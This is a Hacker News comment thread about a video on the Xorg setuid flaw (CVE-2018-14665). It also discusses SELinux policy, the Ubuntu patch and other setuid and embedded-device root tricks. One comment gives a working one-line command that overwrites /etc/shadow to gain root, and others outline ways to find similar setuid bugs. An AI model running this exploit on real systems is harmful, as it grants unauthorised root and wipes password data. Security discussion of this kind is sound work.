
EXploit X: “Give Me Root” [video] - octosphere
https://www.youtube.com/watch?v=3vCpYgaZpiw
======
megous
One way I got root recently, aside from pivoting on a setuid 0 binary, was
calling seteuid(0). The vendor's program manager on the device forgot to
setuid(user_id), it only seteuid(user_id). So going back to root was as easy
as seteuid(0). The joy of real and effective process user. :)

Other easy way, if you have a way to provide your own filesystem to the device
(via SD card for example), is to just put an Ext filesystem on it, and add
your own setuid 0 binary there. Device makers sometimes don't know what
they're doing, so they don't mount untrusted removable devices with -o
nosuid,noexec,nodev ...

That works even if there's no usable setuid 0 binary on the rootfs.

~~~
megous
It doesn't help my confidence in the world, that this was a PoS terminal
device from a self described "Leader in Payment Terminals". But hey, they even
read random files on the filesystem from a kernel USB device driver, and they
probably got to the market first, so that's what matters.

Thankfully, AFAIK, this particular device is not sold anymore.

~~~
microcolonel
> _a self described "Leader in Payment Terminals"_

In a marathon, the leader is not so much the _healthiest_ of the bunch.

Also, this is a PoS terminal, if there's any wonder left in you for how they
could mess this up so bad, I'm guessing this is the first one you've seen. ;-
)

~~~
megous
Yes, the first one. One thing I liked about it though is that the vendor uses
uniform ioctl calling convention for pretty much everything they implement in
the kernel, so I have modified strace to decode their ioctl payload, and I was
able to rewrite most of their library code with my implementation, with the
help of traces of their demo app. Now I can drop their complicated and buggy
userspace code completely and use my own rootfs.

The kernel is harder, since they also violate GPL and don't provide kernel
source code along with their terminal, and neither does their SoC vendor.

------
_nalply
The exploit is overwriting /etc/shadow with the log of Xorg. If you pass the
right string somehow you overwrite the root password. The trick is setting the
font path and the font path appears in the log. Of course this fills
/etc/shadow with a lot of bogus data, but one line in the log which describes
the root password is enough. Xorg can overwrite /etc/shadow when it is setuid
root.

Attention: don't attempt it on a system you need. The exploit is destroying
all user's passwords. Or at least make a copy of /etc/shadow before trying.

~~~
smsm42
> The exploit is overwriting /etc/shadow with the log of Xorg.

That took me couple of seconds to read and I got virtually the same
information as the 11 minute video. I think there's no question about which
way of doing things is more efficient.

------
DyslexicAtheist
# get root:

    
    
       cd /etc; Xorg -fp "root::<passwd>::" -logfile shadow :1;su

~~~
dan1234
How many linux servers have Xorg installed? Certainly none of mine, though I
mainly work with web & db servers.

~~~
pastage
Lots of RHEL servers do, but I would guess that selinux stops this exploit, I
see no reason for X to have write permission in /etc.

~~~
gizmo686
Redhat ships with a targeted policy. Most of the non-network programs are put
in a very permissive domain to avoid breakage.

I just checked the CentOS policy[0] (not at work and don't have easy access to
the Redhat repos).

It appears that xserver_t does have write access to both etc_t and shadow_t
[1].

More specifically, xserver_t is part of the selinux_unconfined_type attribute,
which means that it can do pretty much anything. (Even more specifically, it
is part of the files_unconfined_type attribute, which gives it write
permissions to everything in file_type):

    
    
      > sesearch --allow -s xserver_t -t shadow_t -c file policy.31
      allow files_unconfined_type file_type:file execmod; [ selinuxuser_execmod ]:True
      allow files_unconfined_type file_type:file { append audit_access create execute execute_no_trans getattr ioctl link lock mounton open quotaon read relabelfrom relabelto rename setattr swapon unlink write };
    
    

[0] [https://centos.pkgs.org/7/centos-updates-x86_64/selinux-
poli...](https://centos.pkgs.org/7/centos-updates-x86_64/selinux-policy-
targeted-3.13.1-192.el7_5.6.noarch.rpm.html)

[1] Because of its sensitive nature, /etc/shadow has its own SELinux label

------
EugeneOZ
Why video? It's not about fashion or architecture, please people use text.

~~~
octosphere
Some people (like me) are visual learners / auditory learners and
Computerphile caters to that niche of learners. This is why I prefer
videos/audio over tangible books that you can hold. It is also common to see
me putting blogposts into text-to-speech programs and then I listen to them at
night or on the train.

~~~
EugeneOZ
Well.. I knew about visual learners, I didn't know how strong is this effect.
At least I learned today :) Sorry.

~~~
a_bonobo
Both of you may be interested in this research from last year:

No evidence to back idea of learning styles

[https://www.theguardian.com/education/2017/mar/12/no-
evidenc...](https://www.theguardian.com/education/2017/mar/12/no-evidence-to-
back-idea-of-learning-styles)

~~~
EugeneOZ
It's not research, it's just a manifest.

~~~
octosphere
We are naturally inclined to have certain biases towards different learning
styles. It's really a psychology issue. What bothers me about these studies
that claim we should 'work harder' on our weaknesses (i.e visual learners
should read more books/text) - is that we should also build on strength.

When you bolster one learning style and neglect the other, but learn more in
the process of the preferred learning style, then why not see it to the end,
and understand / digest the knowledge gained?

I guess it is about balance. If I am a pure visual (or auditory) learner, then
surely I would have learned that books/text have their place. I imagine that
the greatest learners out there use _all_ the learning styles but still have a
bias towards their learning style. How pronounced that bias is, is still
unknown.

------
molsson
Looks like it was patched in Ubuntu 18.04 just two weeks ago, see "apt
changelog xserver-xorg-core":

xorg-server (2:1.19.6-1ubuntu4.2) bionic-security; urgency=medium

    
    
      * SECURITY UPDATE: Privilege escalation and file overwrite
        - debian/patches/CVE-2018-14665.patch: disable -logfile and -modulepath
          when running with elevated privileges in
          hw/xfree86/common/xf86Init.c.
        - CVE-2018-14665
    
     -- Marc Deslauriers <marc.deslauriers@ubuntu.com>  Thu, 25 Oct 2018 11:18:32 -0400

------
_nalply
Xorg might not be the only exploitable software. Here the approach to search
for other exploits:

1\. Is the software setuid-root?

2\. Does the software stay as root?

3\. Can you make it write a user description line like as in /etc/shadow?

4\. Can you direct it to write to /etc/shadow?

An example: Xorg is setuid-root and stays as root. Pass it the root's
description line as a (bogus) font path and it will write an error message.
Redirect the error message to /etc/shadow and your exploit is finished.

I am afraid that other setuid-root programs could be exploitable.

setuid-root is extremely dangerous.

~~~
molsson
find other setuid binaries on your system using: find / -user root -perm -4000
-print 2>&1 | grep -v "Permission denied"

------
netsec_burn
Wouldn't it be far safer to use cron? Or authorized_keys? Why passwd?

~~~
MayeulC
I am not sure I quite got your question, and had a very succinct look at the
video, but passwd is being used here as a way to check whether the user has
root access.

It is important to note that this exploit is an old one, has been known for a
while, and is one of the things being addressed by switching to Wayland.

That said, a lot of work has been done towards running X11 rootless (Arch for
instance [1]). That should be possible as long as you use DRI, as far as I
know (which is the case if you use a graphics card less than about ~10-20
years old, depending on the brand).

[1]
[https://wiki.archlinux.org/index.php/Xorg#General](https://wiki.archlinux.org/index.php/Xorg#General)

